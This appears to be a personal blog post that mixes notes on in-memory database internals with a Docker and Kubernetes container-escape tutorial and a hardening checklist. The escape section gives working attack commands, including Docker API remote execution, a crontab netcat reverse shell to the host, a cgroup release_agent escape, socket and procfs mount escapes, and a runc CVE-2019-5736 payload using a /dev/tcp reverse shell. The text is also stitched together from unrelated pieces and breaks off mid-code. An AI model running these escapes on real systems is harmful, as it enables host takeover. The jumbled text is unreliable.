ljluestc'Blog

Jan 23 2023

Cloud Native Security

database history

Cloud native is a set of technologies and a methodology. The name combines two words: "cloud" means the application lives in the cloud rather than in a traditional data center; "native" means the application is designed for the cloud environment from the start, so that it runs well there and makes full use of the elasticity and distributed nature of cloud platforms.

Representative cloud-native technologies include containers, service meshes, microservices, immutable infrastructure, and declarative APIs.

disk database

For most of their history, DBMSs have had to work around hardware constraints. The hardware of the time when databases were first designed was very different:
- a single processor with a single core
- severely limited RAM
- the database had to be stored on disk
- disks were much slower than they are today

Memory capacity is now large enough that an entire database can often fit in memory. Structured data sets are usually relatively small, while unstructured or semi-structured data sets are relatively large.

We need to understand why a traditional disk-oriented database with a large cache still does not achieve optimal performance.

Disk-oriented database
- The primary storage location of the database is a non-volatile device (HDD or SSD).
- The database is usually organized as fixed-size pages.
- The system uses a buffer pool to cache pages read from disk in memory, moving pages back and forth between disk and memory.
- A tuple's record ID must be translated to a location in memory.
- A worker thread must pin a page to make sure it is not swapped out to disk.

Concurrency control: the system must assume that a transaction may stall at any time while it reads data that is not in memory.

Logging and recovery: most databases use a STEAL + NO-FORCE buffer policy, and modifications must be flushed to the WAL. Log records contain the before and after images of each modification, and a lot of work goes into keeping track of the various LSNs.

Share of time spent in each mechanism: BUFFER 34%, LATCH 14%, LOCK 16%, LOG 12%, BTREE 16%, REAL WORK 7%.
Paper: OLTP Through the Looking Glass, and What We Found There
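The pin/unpin bookkeeping of a disk-oriented buffer pool can be sketched in a few lines. This is only a toy model under stated assumptions: the class name BufferPool, the dict standing in for the disk, and the LRU eviction policy are all hypothetical choices for illustration, not taken from any particular DBMS.

```python
from collections import OrderedDict


class BufferPool:
    """Toy buffer pool: fixed number of frames, LRU eviction, pin counts."""

    def __init__(self, capacity, disk):
        self.capacity = capacity
        self.disk = disk             # dict page_id -> bytes, stands in for the HDD/SSD
        self.frames = OrderedDict()  # page_id -> [data, pin_count, dirty]

    def pin(self, page_id):
        """Return the in-memory copy of a page, loading it from disk if needed."""
        if page_id not in self.frames:
            if len(self.frames) >= self.capacity:
                self._evict()
            self.frames[page_id] = [bytearray(self.disk[page_id]), 0, False]
        self.frames.move_to_end(page_id)  # mark as most recently used
        frame = self.frames[page_id]
        frame[1] += 1                     # a pinned page cannot be evicted
        return frame[0]

    def unpin(self, page_id, dirty=False):
        frame = self.frames[page_id]
        frame[1] -= 1
        frame[2] = frame[2] or dirty

    def _evict(self):
        # Pick the least recently used page that nobody has pinned.
        victim = next((pid for pid, f in self.frames.items() if f[1] == 0), None)
        if victim is None:
            raise RuntimeError("all pages are pinned")
        data, _, dirty = self.frames.pop(victim)
        if dirty:
            self.disk[victim] = bytes(data)  # write back before dropping the frame
```

Every page access pays for this lookup, pin, and possible eviction even when the whole database would fit in memory, which is the overhead the BUFFER share above refers to.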

Memory Database

Build - deploy - run

Assume that the primary storage location of the database is permanently in memory. The idea was first proposed in the 1980s, but only now have memory prices and capacities made it easy to do. The first in-memory databases were released in the 1990s, for example TimesTen, DataBlitz, and Altibase.

Data organization
- Data is no longer stored in slotted pages, but it is still organized in pages.
- Direct memory pointers vs. record IDs.
- Fixed-length vs. variable-length data pools.
- Checksums are used to detect database corruption caused by software bugs.
- The operating system also organizes memory in pages.

Index: usually rebuilt after the database restarts, mainly to avoid logging overhead.

Query processing
- Sequential access is no longer significantly faster than random access.
- The traditional one-tuple-at-a-time iterator model becomes slow because of function call overhead. The problem is more serious in OLAP databases.

Logging and recovery
- The DBMS still needs a WAL on non-volatile storage.
- Group commit batches log flushes to amortize the fsync overhead.
- The various LSNs are no longer needed because there are no dirty pages.

Bottlenecks
If I/O is no longer the slowest resource, the architecture of most DBMSs has to change to account for other bottlenecks, including locking/latching, cache-line misses, pointer chasing, predicate evaluation, and networking.

Concurrency control
- For an in-memory database, acquiring a transaction lock costs about the same as accessing the data in memory.
- The new bottleneck is contention caused by transactions accessing the same data.
- The database can store lock information together with the tuple data to preserve CPU cache locality.
- Mutexes are too slow; CAS instructions are needed.
- Two-phase locking (2PL): deadlock detection, deadlock prevention.
- Timestamp ordering (T/O): basic T/O checks for conflicts on every read and write and copies the tuple on each access to guarantee repeatable reads; OCC keeps all changes in a private workspace and checks for conflicts at commit time.
- Optimistic protocols suit low-contention workloads; pessimistic protocols suit high-contention workloads.

Overhead bottlenecks of the concurrency control protocols
- Lock thrashing: 2PL with deadlock detection, 2PL with WAIT_DIE
- Timestamp allocation: all timestamp protocols + WAIT_DIE
- Memory allocation: OCC + MVCC (do not use the default malloc)

Thoughts
- In-memory database design differs significantly from disk-oriented database design.
- The world has finally become comfortable with in-memory data storage and processing.
- DRAM capacity growth has stagnated compared with SSDs.
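The OCC idea mentioned above (private writes, validation at commit) can be sketched as follows. This is a single-threaded illustration with hypothetical names (OCCStore, begin, commit); a real engine would make the validate-and-install step atomic, for example with CAS on per-tuple version words.

```python
class OCCStore:
    """Toy optimistic concurrency control: private write sets, validate at commit."""

    def __init__(self):
        self.data = {}  # key -> (value, version)

    def begin(self):
        return {"reads": {}, "writes": {}}

    def read(self, txn, key):
        if key in txn["writes"]:            # read your own uncommitted write
            return txn["writes"][key]
        value, version = self.data.get(key, (None, 0))
        txn["reads"][key] = version         # remember which version was seen
        return value

    def write(self, txn, key, value):
        txn["writes"][key] = value          # kept private until commit

    def commit(self, txn):
        # Validation: abort if anything we read has changed since we read it.
        for key, seen in txn["reads"].items():
            if self.data.get(key, (None, 0))[1] != seen:
                return False
        # Write phase: install the private writes and bump versions.
        for key, value in txn["writes"].items():
            version = self.data.get(key, (None, 0))[1]
            self.data[key] = (value, version + 1)
        return True
```

With little contention almost every commit validates on the first try; under heavy contention many transactions abort and retry, which is why pessimistic protocols are preferred there.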

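Build-time security (Build)
- Operate and audit container images with a rule engine
  - Dockerfile
  - Suspicious files
  - Sensitive permissions
  - Sensitive ports
  - Vulnerabilities in base software
  - Business software
Deploy-time security (Deployment)
- Kubernetes
Runtime security (Runtime)
- HIDS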

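Before and after an attack

Before the attack: trim the attack surface and reduce what is exposed externally (keyword for the scenarios in this article: isolation).
During the attack: lower the attacker's success rate (keyword for the scenarios in this article: hardening).
After the attack: limit the valuable information and data an attacker can obtain after a successful attack, and make it harder to leave a backdoor.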

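Container attack surface

Linux kernel vulnerabilities
- Kernel privilege escalation
- Container escape
The container runtime itself
- CVE-2019-5736: runc - container breakout vulnerability
Insecure deployment (configuration)
- Privileged containers, or containers running as root;
- Unreasonable capability configuration (overly broad capabilities).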

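Container Escape

Determining whether the current machine is a Docker container

Check the process name of PID 1

If PID 1 is the application process itself, the environment is a container. If it is init or systemd, the environment is not necessarily a container, although a container cannot be ruled out: in an LXD instance, for example, PID 1 is /sbin/init.

ps -p 1

Check for kernel files

Unlike a virtual machine, a container shares the kernel with its host, so in theory there are no kernel files inside a container unless the host's /boot directory has been mounted.

KERNEL_PATH=$(cat /proc/cmdline | tr ' ' '\n' | awk -F '=' '/BOOT_IMAGE/{print $2}')
test -e "$KERNEL_PATH" && echo "Not Sure" || echo "Container"

Check whether /proc/1/cgroup contains the string "docker"; the same command also reveals the UUID of the Docker container.

Containers rely on cgroups for resource limits, and every container is placed in its own cgroup. For Docker the cgroup is named docker-xxxx, where xxxx is the UUID of the container. Limiting a container's resources really means limiting the resources of the processes running inside it, so the cgroup name of PID 1 inside the container gives a useful clue.

cat /proc/1/cgroup

cat /proc/1/cgroup | grep -qi docker && echo "Docker" || echo "Not Docker"

Check whether the .dockerenv file exists in the root directory

ls -la /.dockerenv

[[ -f /.dockerenv ]] && echo "Docker" || echo "Not Docker"

Other methods

sudo readlink /proc/1/exe
# If the output contains "system" (for example a systemd path), this is the host

systemd-detect-virt -c
# "none" means this is the host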
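The file-based checks above can be combined into one small helper. This is a minimal sketch: the function name container_hints and the root parameter (added only so the function can be pointed at a test directory) are hypothetical, and none of these heuristics is conclusive. On hosts using cgroup v2, for instance, /proc/1/cgroup inside a container frequently shows only "0::/", so the cgroup check can miss.

```python
import os


def container_hints(root="/"):
    """Return the list of heuristics that suggest we are inside a Docker container."""
    hints = []
    # Docker creates /.dockerenv in the container's root directory.
    if os.path.isfile(os.path.join(root, ".dockerenv")):
        hints.append("dockerenv")
    # On cgroup v1 the cgroup path of PID 1 usually contains "docker".
    try:
        with open(os.path.join(root, "proc/1/cgroup")) as f:
            if "docker" in f.read().lower():
                hints.append("cgroup")
    except OSError:
        pass  # file missing or unreadable: no evidence either way
    return hints


if __name__ == "__main__":
    found = container_hints()
    print("Docker" if found else "Not sure", found)
```

An empty result does not prove the machine is a host; it only means these two indicators were absent.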

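Docker Escape

User layer
- User misconfiguration
- Dangerous mounts
Service layer: flaws in the container service itself (program vulnerabilities)
System layer: Linux kernel vulnerabilities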

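Docker escape through misconfiguration

Unauthenticated access to the Docker Remote API

docker swarm

Docker Swarm is Docker's official tool for turning a cluster of Docker hosts into a single virtual Docker host. It uses the standard Docker API, which makes a Docker cluster easy to manage and scale.

Docker Swarm manages a Docker cluster in a manager/worker arrangement and communicates over port 2375 by default. A Docker Remote API service is bound to that port, so Docker can be driven over HTTP, for example with curl or from Python.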
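On the defensive side, one way to spot this exposure is to look for tcp:// listeners in the daemon configuration that are not protected by TLS client verification. The sketch below assumes the configuration lives in a daemon.json file and uses its "hosts" and "tlsverify" keys; the function name insecure_tcp_hosts is hypothetical, and listeners passed with -H on the dockerd command line are not visible to it.

```python
import json


def insecure_tcp_hosts(daemon_json_text):
    """Return tcp:// listeners from daemon.json that lack TLS client verification."""
    cfg = json.loads(daemon_json_text)
    if cfg.get("tlsverify"):
        return []  # clients must present a certificate signed by the trusted CA
    return [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]


if __name__ == "__main__":
    try:
        with open("/etc/docker/daemon.json") as f:
            print(insecure_tcp_hosts(f.read()))
    except FileNotFoundError:
        print("no daemon.json found")
```

Any address this returns is reachable by whoever can connect to it, which is the precondition for the attacks described in this section.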

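Setting up the vulnerable environment

Use vulhub to set up the environment: docker daemon api unauthorized access vulnerability

Exploit 1: RCE in a container

List all containers on the host:

curl -i -s -X GET http://<docker_host>:PORT/containers/json

Create an "exec" instance that will run in the container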

POST /containers/<container_id>/exec HTTP/1.1
Host: <docker_host>:PORT
Content-Type: application/json
Content-Length: 188

{
  "AttachStdin": true,
  "AttachStdout": true,
  "AttachStderr": true,
  "Cmd": ["cat", "/etc/passwd"],
  "DetachKeys": "ctrl-p,ctrl-q",
  "Privileged": true,
  "Tty": true
}

As a bash command

curl -i -s -X POST \
-H "Content-Type: application/json" \
--data-binary '{"AttachStdin": true,"AttachStdout": true,"AttachStderr": true,"Cmd": ["cat", "/etc/passwd"],"DetachKeys": "ctrl-p,ctrl-q","Privileged": true,"Tty": true}' \
http://<docker_host>:PORT/containers/<container_id>/exec

Start the exec instance

POST /exec/<exec_id>/start HTTP/1.1
Host: <docker_host>:PORT
Content-Type: application/json

{
 "Detach": false,
 "Tty": false
}

As a bash command

curl -i -s -X POST \
-H 'Content-Type: application/json' \
--data-binary '{"Detach": false,"Tty": false}' \
http://<docker_host>:PORT/exec/<exec_id>/start

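Exploit 2: RCE on the host

The approach is to start an arbitrary container with the host's /etc directory mounted into it, which allows arbitrary file reads and writes. A command can then be written into the crontab configuration file to obtain a reverse shell.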

import docker

client = docker.DockerClient(base_url='http://your-ip:2375/')
data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc your-ip 21 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})

Exploiting with cdk

Run the command directly with cdk:

./cdk run docker-api-pwn http://127.0.0.1:2375 "touch /host/tmp/docker-api-pwn"

This mounts the host's root directory / at /host inside a container and then runs the user-supplied command to tamper with files on the host; writing /etc/crontab, for example, is enough to take over the host.

Reference: Exploit: docker api pwn

High-risk Docker startup flag --privileged: starting a container in privileged mode

Cause

When the operator executes docker run --privileged, Docker allows the container to access all devices on the host and also adjusts the AppArmor or SELinux configuration so that the container has almost the same access rights as processes running directly on the host.
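One visible effect of privileged mode is the effective capability set of processes in the container. The sketch below decodes the CapEff line of /proc/self/status and tests a single bit; the function name has_cap is hypothetical, and the bit number 21 for CAP_SYS_ADMIN comes from the Linux capability definitions.

```python
CAP_SYS_ADMIN = 21  # bit number of CAP_SYS_ADMIN in <linux/capability.h>


def has_cap(status_text, cap_bit):
    """Check one capability bit in the CapEff line of a /proc/<pid>/status dump."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            mask = int(line.split()[1], 16)  # the mask is printed as hex
            return bool((mask >> cap_bit) & 1)
    return False  # no CapEff line found


if __name__ == "__main__":
    try:
        with open("/proc/self/status") as f:
            print("CAP_SYS_ADMIN:", has_cap(f.read(), CAP_SYS_ADMIN))
    except OSError:
        print("/proc/self/status is not available on this system")
```

A container started with default settings normally lacks this bit, so seeing it set inside a container is a strong hint that it was started with --privileged or --cap-add=SYS_ADMIN.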

Environment setup

sudo docker run -itd --privileged ubuntu:latest /bin/bash

Exploitation

List the disks: fdisk -l
Create a directory to mount on: mkdir /aa
Mount the host's /dev/sda1 device at /aa inside the container: mount /dev/sda1 /aa
Files can now be written to obtain access or data

With cdk:

./cdk run mount-disk

Exploiting the high-risk Docker startup flag --cap-add=SYS_ADMIN

Docker uses Linux namespaces to isolate six kinds of resources: host name, user permissions, file system, network, process IDs, and inter-process communication. Some startup flags, however, grant the container broader permissions and so break the isolation boundary.

--cap-add=SYS_ADMIN  allows privileged mount operations; exploitation still requires a resource to mount.
--net=host           bypasses the network namespace
--pid=host           bypasses the PID namespace
--ipc=host           bypasses the IPC namespace
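The flags listed above leave traces in the HostConfig section of docker inspect output, so existing containers can be audited for them. This is a rough sketch: the function name risky_settings and the short list of sensitive bind sources are assumptions chosen for illustration, not a complete policy.

```python
import json

SENSITIVE_BINDS = ("/", "/proc", "/var/run/docker.sock")  # illustrative, not exhaustive


def risky_settings(inspect_json):
    """Flag isolation-breaking options in the JSON printed by `docker inspect`."""
    findings = []
    for container in json.loads(inspect_json):
        name = container.get("Name", "?")
        host = container.get("HostConfig", {})
        if host.get("Privileged"):
            findings.append((name, "privileged"))
        for cap in host.get("CapAdd") or []:      # CapAdd is null when unused
            if cap.upper() in ("SYS_ADMIN", "CAP_SYS_ADMIN"):
                findings.append((name, "cap-add SYS_ADMIN"))
        for field in ("NetworkMode", "PidMode", "IpcMode"):
            if host.get(field) == "host":
                findings.append((name, f"{field}=host"))
        for bind in host.get("Binds") or []:      # entries look like src:dst[:mode]
            if bind.split(":")[0] in SENSITIVE_BINDS:
                findings.append((name, f"bind {bind}"))
    return findings
```

It could be fed with something like `docker inspect $(docker ps -q)` and the output reviewed by hand.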

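Prerequisites:

The attacker is root inside the container
The container runs with the SYS_ADMIN Linux capability
The container has no AppArmor profile, or its profile allows the mount syscall
The cgroup v1 virtual file system is mounted read-write inside the container

We need a cgroup in which we can write the notify_on_release file (to enable cgroup notifications). Mount a cgroup controller and create a child cgroup, start a /bin/sh process and write its PID into the cgroup.procs file; when sh exits, the release_agent file is executed.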

# On the host
docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash
# In the container
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent

echo '#!/bin/sh' > /cmd
echo "ls > $host_path/output" >> /cmd
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

Check the output file

ls /tmp/cgrp
cat /output

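Docker escape through dangerous mounts

Mounting a directory (-v /:/soft)

docker run -itd -v /dir:/dir ubuntu:18.04 /bin/bash

Mounting the Docker socket

Reproducing the escape

First create a container with /var/run/docker.sock mounted

docker run -itd -v /var/run/docker.sock:/var/run/docker.sock ubuntu

Install the Docker command-line client inside that container

apt-get update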
apt-get install \
apt-transport-https \
ca-certificates \
curl \
gnupg-agent \
software-properties-common
curl -fsSL https://mirrors.ustc.edu.cn/docker-ce/linux/ubuntu/gpg | apt-key add -
apt-key fingerprint 0EBFCD88
add-apt-repository \
"deb [arch=amd64] https://mirrors.ustc.edu.cn/docker-ce/linux/ubuntu/ \
$(lsb_release -cs) \
stable"
apt-get update
apt-get install docker-ce docker-ce-cli containerd.io

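Then use that client to talk to the Docker daemon through the Docker socket, sending commands to create and run a new container with the host's root directory mounted inside it

docker run -it -v /:/host ubuntu:18.04 /bin/bash

Inside the new container, run chroot to switch the root directory to the mounted host root.

chroot /host

Run the command with the cdk tool:

./cdk run docker-sock-pwn /var/run/docker.sock "touch /host/tmp/pwn-success"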

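Mounting the procfs directory

About procfs

procfs is a pseudo file system that dynamically reflects the state of processes and other components in the system, and it contains many highly sensitive files. Mounting the host's procfs into an uncontrolled container is therefore dangerous, especially when the container runs as root by default and user namespaces are not enabled.

The exploitation process is fairly involved, but cdk makes it quick. Example:

On the host, start a test container with the host's procfs mounted, then try to escape from it: docker run -v /root/cdk:/cdk -v /proc:/mnt/host_proc --rm -it ubuntu bash
Inside the container, run ./cdk run mount-procfs /mnt/host_proc "touch /tmp/exp-success"
If /tmp/exp-success appears on the host, the exploit has succeeded and the attacker can run arbitrary commands on the host.

Reference: Exploit: mount procfs

Mounting the cgroup directory

Exploiting with cdk

./cdk run mount-cgroup "<shell-cmd>"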

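Docker escape through program vulnerabilities

CVE-2019-5736: runc container escape vulnerability

Vulnerability details

Docker, containerd, and other runc-based container runtimes contain a vulnerability that lets an attacker, through a crafted container image or an exec operation, obtain the file handle of the host's runc binary while it executes and overwrite that binary, thereby gaining root execution on the host.

Affected versions

Docker < 18.09.2
runc <= 1.0-rc6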
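Checking a Docker version string against the affected range stated above is a simple tuple comparison. This is a small sketch; the function names are hypothetical, and the input is assumed to be a string like the one printed by docker version --format '{{.Server.Version}}'.

```python
import re


def parse_version(version):
    """Extract (major, minor, patch) from strings such as '18.09.1' or '18.09.1-ce'."""
    match = re.match(r"(\d+)\.(\d+)\.(\d+)", version)
    if not match:
        raise ValueError(f"unrecognized version: {version!r}")
    return tuple(int(part) for part in match.groups())


def docker_affected_by_cve_2019_5736(version):
    """True if the Docker version is older than 18.09.2, the range given above."""
    return parse_version(version) < (18, 9, 2)
```

Distribution packages sometimes backport fixes without changing the upstream version number, so a result of True is a prompt to check the vendor advisory rather than proof of exposure.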

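Exploitation steps

Use the PoC:

POC: CVE-2019-5736-PoC

Modify the payload

vi main.go
payload = "#!/bin/bash \n bash -i >& /dev/tcp/192.168.172.136/1234 0>&1"

Compile

CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go

Copy the binary into the Docker container and run it
Wait for the victim to attach to the container with docker exec
Receive the reverse shell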

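CVE-2019-14271: Docker cp command container escape vulnerability

Vulnerability details

When the cp command is used on a Docker host, it invokes the helper process docker-tar. That process is not containerized, and at run time it dynamically loads some libnss.so libraries. By replacing libnss.so and similar libraries inside the container, an attacker can inject code into docker-tar. When a Docker user then tries to copy files out of the container, the malicious code runs, escaping the container and gaining root on the host.

Affected versions

Docker 19.03.0

References

Docker Patched the Most Severe Copy Vulnerability to Date With CVE-2019-14271

CVE-2019-13139 Docker build code execution

References

CVE-2019-13139 - Docker build code execution

Docker escape through kernel vulnerabilities

Docker escape with Dirty COW (CVE-2016-5195)

Vulnerability description

Dirty COW (CVE-2016-5195) is a privilege-escalation vulnerability in the Linux kernel. It can be used to escape from a Docker container and obtain a root shell.

Docker shares the kernel with the host, so the container has to run on a host whose kernel is vulnerable to Dirty COW.

Reproducing the vulnerability

Get the environment: git clone https://github.com/gebl/dirtycow-docker-vdso.git

Tooling: CDK

CDK: https://github.com/cdk-team/CDK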

Copy it into the container

# On the host
docker cp /Users/ljluestc/Downloads/cdk_linux_amd64 e39eb7abd9e6:/root

# In the container
cd /root
mv cdk_linux_amd64 cdk
chmod 777 cdk

Common commands

# Gather information
cdk evaluate

# List all exploits
cdk run --list

# Run a specific exploit
cdk run <script-name> [options]

OLTP index B+Tree Bw-Tree

The check items of cdk evaluate are a useful starting point for this topic.

"Full key" data structures
- An order-preserving "full key" data structure stores all bits of a key in a node.
- Worker threads must compare complete search keys.
- "Partial key" data structures (such as tries) are discussed in the next lesson.

Main content
- In-memory T-Tree
- Lock-free Bw-Tree
- B+Tree optimistic locking

Observation
The original B+Tree is an efficient access method designed for slow disks. Are there alternatives for in-memory databases?

T-Tree
- Based on the balanced binary AVL tree; nodes do not store keys but pointers to the original values.
- Proposed in 1986 and used in TimesTen and some other early in-memory databases.
- Advantages: uses less memory because keys are not kept in the nodes; the DBMS evaluates all predicates on the table (not just those on indexed attributes) at the same time when it accesses a tuple.
- Disadvantages: hard to rebalance; hard to make safe for concurrent access; scans have to chase pointers, which hurts cache locality.

Bw-Tree
- CAS can update only one address at a time. This limits the design of the data structure: a lock-free B+Tree cannot be built directly, because splits and merges (SMOs) have to update several pointers.
- What if there were a layer of indirection that made it possible to update several addresses atomically?
- The Bw-Tree is a lock-free B+Tree index proposed in the Microsoft Hekaton project.
- Key ideas: (1) deltas: no in-place updates, which reduces cache invalidation; (2) mapping table: CAS operates on the physical location of a page.
- Bw-Tree operations: delta updates, search, conflicting updates, consolidation, garbage collection (reference counting, epoch-based GC), and structure modifications.

Performance comparison
- Processor: 1 socket, 10 cores w/ 2xHT
- Payload: 50m random integer keys (64-bit)
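The two Bw-Tree ideas, delta records and a mapping table updated by CAS, can be illustrated with a toy model. This is only a sketch under stated assumptions: Python has no user-level CAS instruction, so a lock stands in for its atomicity; all class and function names are hypothetical; splits, merges, and garbage collection are left out.

```python
import threading


class MappingTable:
    """Maps a logical page id to the head of that page's delta chain."""

    def __init__(self):
        self._slots = {}
        self._lock = threading.Lock()  # stands in for the atomicity of a hardware CAS

    def get(self, pid):
        return self._slots.get(pid)

    def cas(self, pid, expected, new):
        with self._lock:
            if self._slots.get(pid) is expected:
                self._slots[pid] = new
                return True
            return False


class Base:
    def __init__(self, items):
        self.items = dict(items)


class Delta:
    def __init__(self, key, value, next_node):
        self.key, self.value, self.next = key, value, next_node  # value None = delete


def upsert(table, pid, key, value):
    """Prepend a delta record instead of updating the page in place."""
    while True:
        head = table.get(pid)
        if table.cas(pid, head, Delta(key, value, head)):
            return  # on failure another thread won the race, so retry


def lookup(table, pid, key):
    node = table.get(pid)
    while isinstance(node, Delta):  # newest delta first
        if node.key == key:
            return node.value
        node = node.next
    return node.items.get(key) if node else None


def consolidate(table, pid):
    """Fold the delta chain into a new base page and swap it in with one CAS."""
    head = table.get(pid)
    deltas, node = [], head
    while isinstance(node, Delta):
        deltas.append(node)
        node = node.next
    items = dict(node.items) if node else {}
    for delta in reversed(deltas):  # replay oldest first
        if delta.value is None:
            items.pop(delta.key, None)
        else:
            items[delta.key] = delta.value
    return table.cas(pid, head, Base(items))
```

Because every change swings a single mapping-table slot, readers never see a half-applied update, and the old chain can be reclaimed later once no thread can still be traversing it.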

Pitfalls when setting up k8s

Reference:

First install k8s through docker-desktop; reference: https://github.com/maguowei/k8s-docker-desktop-for-mac
Install the Kubernetes dashboard: kubectl apply -f https://raw.githubusercontent.com/kubernetes/dashboard/v2.2.0/aio/deploy/recommended.yaml
Start the local proxy: kubectl proxy
Open http://localhost:8001/api/v1/namespaces/kubernetes-dashboard/services/https:kubernetes-dashboard:/proxy/
Get a token with the steps below
Install helm
1. brew install helm
2. helm repo add stable http://mirror.azure.cn/kubernetes/charts/
3. helm repo update
4. helm install my-mysql stable/mysql

Create a user:

kubectl apply -f dashboard-adminuser.yaml

Contents of dashboard-adminuser.yaml:

apiVersion: v1
kind: ServiceAccount
metadata:
  name: admin-user
  namespace: kube-system

Get the token

kubectl -n kube-system describe secret $(kubectl -n kube-system get secret | grep admin-user | awk '{print $1}')

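kube-proxy boundary bypass (CVE-2020-8558)

An attacker in a container on the same LAN, or on a cluster node, may be able to reach TCP/UDP services that are bound to 127.0.0.1 on a neighboring node in the same layer-2 domain, and thereby obtain information from those interfaces.

For details, see: CVE-2020-8558: Kubernetes localhost boundary bypass vulnerability advisory

List the services that may be affected:

lsof +c 15 -P -n -i4TCP@127.0.0.1 -sTCP:LISTEN
lsof +c 15 -P -n -i4UDP@127.0.0.1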
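Where lsof is not installed, the TCP half of the same information can be read from /proc/net/tcp. This is a minimal sketch: the function name loopback_listeners is hypothetical, it covers IPv4 TCP only, and it assumes a little-endian machine, where 127.0.0.1 appears as 0100007F.

```python
def loopback_listeners(proc_net_tcp_text):
    """Return the TCP ports in LISTEN state bound to 127.0.0.1."""
    ports = []
    for line in proc_net_tcp_text.splitlines()[1:]:  # first line is the header
        fields = line.split()
        if len(fields) < 4:
            continue
        addr_hex, port_hex = fields[1].split(":")    # local_address column
        # State 0A is TCP_LISTEN; 0100007F is 127.0.0.1 in little-endian hex.
        if fields[3] == "0A" and addr_hex == "0100007F":
            ports.append(int(port_hex, 16))
    return sorted(ports)


if __name__ == "__main__":
    try:
        with open("/proc/net/tcp") as f:
            print(loopback_listeners(f.read()))
    except OSError:
        print("/proc/net/tcp is not available on this system")
```

Services found this way were written on the assumption that only local processes can reach them, so they are the ones to review on nodes affected by this CVE.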

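K8s API server

Check the environment variables to determine whether the current container belongs to a K8s Pod, obtain the K8s api-server address, and attempt an anonymous login. If that succeeds, the K8s cluster can be taken over directly through the api-server.

Reference: https://github.com/cdk-team/CDK/wiki/Evaluate:-K8s-API-Server

This requires that k8s allows anonymous login, which it does not by default. If the problem exists, cdk kcurl anonymous can be used to send HTTP requests.

K8s Service Account

In Pods created by a K8s cluster, containers carry the K8s Service Account credentials by default (/run/secrets/kubernetes.io/serviceaccount/token). CDK uses these credentials to authenticate to the K8s api-server and tries to access high-privilege endpoints. If that succeeds, the account is highly privileged and the Service Account can be used directly to manage the K8s cluster.

Sending custom HTTP requests to the K8s api-server with cdk:

First use cdk evaluate to determine whether the problem exists

Then obtain the address of the k8s api-server

Then send the request with cdk kcurl

After that, CDK can be used to deploy a backdoor Pod and a shadow k8s api-server.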

Store model data layout and system catalogs

This part is translated from online sources and will be tidied up later.

Container

Always use the latest version of Docker
Only allow trusted users to control the Docker daemon
Make sure audit rules are in place that provide an audit trail for:
1. Docker daemon

Make sure all Docker files and directories are owned by an appropriate user (usually root), and set restrictive file permissions on them.

Use a registry with a valid certificate, or one that uses TLS, to minimize the risk of traffic interception.

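If the containers you use do not define an explicit container user in the image, enable user namespace support, which lets you remap the container user to a host user.

Prevent containers from acquiring new privileges. By default containers are allowed to acquire new privileges, so this has to be configured explicitly. Another step that reduces privilege-escalation attacks is removing the setuid and setgid permissions in the image.

Run containers as a non-root user (UID other than 0). By default, containers run as root inside the container.

When building containers, use only trusted base images.

Use minimal base images that do not include unnecessary packages, which would enlarge the attack surface.

Enforce a strong governance policy that mandates frequent image scanning.

Build a workflow that regularly identifies and removes stale or unused images and containers from the host.

Do not store secrets in images or Dockerfiles. Nothing stops you from putting secrets in a Dockerfile by default, but any user of the resulting image can then read them.

When running a container, drop every capability that the container does not need in order to work.

Do not run containers with the --privileged flag, because such containers get most of the capabilities available to the underlying host. The flag also overrides any rules set with CAP DROP or CAP ADD. (Always run Docker images with --security-opt=no-new-privileges to prevent privilege escalation through setuid or setgid binaries.)

Do not mount sensitive host system directories into containers, especially in writable mode, since that exposes them to malicious changes that could compromise the host.

Do not run sshd inside containers. By default the SSH daemon does not run in a container, and you should not install it; this simplifies the security management of SSH servers.

Do not map any port below 1024 into a container; these are treated as privileged ports because they carry sensitive data. By default Docker maps container ports to host ports in the 49153-65535 range, but it does allow mapping to privileged ports. As a rule of thumb, open only the ports the container actually needs.

Unless it is necessary, do not share the host's network, process, IPC, user, or UTS namespaces, so that Docker containers stay properly isolated from the underlying host.

Specify the amount of memory and CPU the container needs to run as designed rather than relying on arbitrary amounts. By default, Docker containers share resources equally with no limits.

Set the container's root file system to read-only. Once running, a container should not need to change its root file system, and any change made to it is likely to be malicious. To preserve immutability (containers are not patched in place but recreated from a new image), do not make the root file system writable.

Impose PID limits. One advantage of containers is tight process identifier (PID) control. Every process in the kernel has a unique PID, and containers use Linux PID namespaces to give each container its own view of the PID hierarchy. A PID limit caps the number of processes running in each container, which prevents runaway process creation and potential malicious lateral movement. It also stops fork bombs (processes that keep replicating themselves) and other anomalous processes. If a service always runs a known number of processes, setting the PID limit to exactly that number mitigates many malicious actions, including reverse shells and remote code injection.

Do not configure mount propagation as shared. Shared propagation means any change to a mount propagates to all instances of that mount. Use slave or private mode instead, so that necessary changes to a volume are not shared with (or propagated to) containers that do not need them.

Do not use docker exec with the --privileged or --user=root options, because these can give the container extended Linux capabilities.

Do not use the default bridge "docker0". The default bridge leaves you exposed to ARP spoofing and MAC flooding attacks. Put containers on a user-defined network instead.

Do not mount the Docker socket inside a container, because that lets processes in the container run commands that give them full control of the host.

Rule 5: Disable inter-container communication (--icc=false)

Use Linux security modules (seccomp, AppArmor, or SELinux)

Rule 7: Limit resources (memory, CPU, file descriptors, processes, restarts)

Rule 8: Set file systems and volumes to read-only

Rule 10: Set the logging level to at least INFO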
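Several of the recommendations above map directly onto docker run flags. The helper below assembles such a command line as a sketch; the function name and the default limits (256m, half a CPU, 100 PIDs, UID/GID 1000) are arbitrary placeholder values, not recommendations from the source.

```python
def hardened_run_args(image, memory="256m", cpus="0.5", pids_limit=100, user="1000:1000"):
    """Build a `docker run` argument list that applies several of the rules above."""
    return [
        "docker", "run", "--rm",
        "--read-only",                       # read-only root file system
        "--cap-drop=ALL",                    # drop all capabilities; add back only what is needed
        "--security-opt=no-new-privileges",  # block setuid/setgid privilege escalation
        f"--pids-limit={pids_limit}",        # PID limit
        f"--memory={memory}",                # memory limit
        f"--cpus={cpus}",                    # CPU limit
        f"--user={user}",                    # run as a non-root user
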